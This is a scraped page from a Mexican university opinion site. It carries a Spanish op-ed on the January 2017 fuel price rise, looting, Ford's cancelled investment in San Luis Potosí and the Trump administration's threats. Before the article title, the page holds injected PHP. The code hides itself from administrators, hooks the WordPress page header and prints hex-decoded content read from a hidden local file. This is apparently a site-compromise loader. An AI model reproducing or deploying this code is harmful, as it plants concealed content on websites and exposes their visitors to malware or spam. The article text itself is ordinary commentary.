if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Educación en Movimiento: ¿FELIZ AÑO 2017? – La Opinión Universitaria La Opinión Universitaria
Menu

Educación en Movimiento: ¿FELIZ AÑO 2017?

 

Por Dr. Jorge Pérez Mejía.

Sin duda hemos iniciado el año con situaciones complejas que ya se venían venir, el anuncio del incremento en las gasolinas a finales del año pasado, hizo que muchas familias se reservaran en los gastos y esto afecto la alegría con la que se esperan estas fechas en particular despedir un año, la situación económica peso en mucha gente, en su ánimo, en la celebración de esas fiestas. Las repercusiones de incrementar los precios de los hidrocarburos, causan una escalada de precios muy fuerte así lo hemos visto, la luz eléctrica, el gas que se utiliza en los hogares,  reetiquetación de  los precios de alimentos de consumo popular, incremento de la verificación, casetas de peaje, incremento de los precios en el transporte federal, son solo algunos ejemplos de esta terrible cuesta de enero y lo que falta.

Un terrible malestar e indignación se apodero  en la mayor parte de la población, las maneras de expresarlo han sido distintas, por un lado la protesta cotidiana con la familia, amigos y compañeros de trabajo e incluso participar en una convocatoria a una marcha en las calles, valido y necesario, es un derecho y se debe ejercer un rechazo total  a estas medidas de políticas gubernamentales decididas por unos cuantos, la otra lo que hemos visto en las calles, concretamente los saqueos, una cosa singular que no habíamos visto en nuestro país y que creo no es la forma de expresar el descontento social, son vándalos, ladrones que creen que así desquitan sus resentimientos y rechazo a la política implementada, jóvenes en su mayoría hombres y mujeres que se transforman ante la posibilidad de tener un bien sin pagarlo. Rechazamos contundentemente estas medidas, esta firma de actuar, existe un estado de derecho con deficiencias claro, barnizado de actos corruptos pero al final da rumbo y estabilidad al país.

Y por si faltara algo, ”Éramos muchos y la abuela pario” y yo diría trillizos, el efecto Trump que ya se dejó sentir. En San Luis Potosí la empresa automotriz Ford anunció la cancelación de su inversión, fue a finales de 2015 cuando esta empresa anunció la inversión de más de mil 600 millones de dólares para la construcción de una nueva planta, de hecho se firmó un convenio con el gobierno del estado y actualmente ya se estaba llevando a cabo el inicio de la construcción de la planta, en el parque industrial WTC II en el municipio de Villa de Reyes.

El anuncio de la compañía estadounidense Ford de cancelar su inversión que iba a generar 2.800 empleos provocó la caída del peso mexicano, devaluándose hasta un 20 % que tocó un nuevo mínimo histórico, Trump ha amenazado en elevar hasta en 35% los aranceles a las empresas automotrices que trasladen su producción a México y esto puede suponer que otras empresas cancelen sus inversiones nuestro país lo que traerá desaparición de miles de fuentes de empleo.

Asimismo la empresa de aires acondicionados Carrier anuncio también la cancelación de mil puestos de trabajo que iba a trasladar a nuestro país, la amenaza a la empresa Toyota también ya se dejó sentir en la cuenta de Twitter del futuro presidente de Estados Unidos. Y no podemos olvidar sus amenazas acerca de nuestros migrantes, particularmente los paisanos, miles de poblanos que hoy viven en una incertidumbre total, recordemos que nuestro Estado es uno de los principales proveedores de mano de obra en los Estados Unidos y si arrecian las políticas migratorias, sin duda varios serán remitidos a nuestro país.

Por otro lado las explicaciones que ha dado el ejecutivo han sido más técnicas y que la mayor parte de la población no entiende, ¿Qué nuestros hijos lo van agradecer?, ¿Qué el daño hubiera sido mayor sino se hubieran tomado etas mediadas dolorosas?, por favor en el largo plazo diría J. M. Keynes todos estaremos muertos y pregúntenle a los jóvenes si quieren tener hijos.

En fin un panorama desolador, este es el que nos tocó enfrentar considero que esto nos obliga a ser mejores todos los días, hacer lo que nos toca y bien, a la primera vez, cada quien en su trinchera, alumnos, docentes, trabajadores administrativos, padres de familia, directivos, funcionarios, políticos, empresarios, ¿Se puede?. ¡ESTOY SEGURO QUE SÍ

                                                  ¡FELIZ AÑO 2017¡

Nos leemos la próxima semana y recuerden “Si transformar la realidad educativa del país es una utopía, lo único cierto es que es realmente posible”.

*Dr. en Educación. Profesor- Investigador de la Benemérita Universidad Autónoma de Puebla  

 

 

 

No comments

Deja una respuesta

Tweets recientes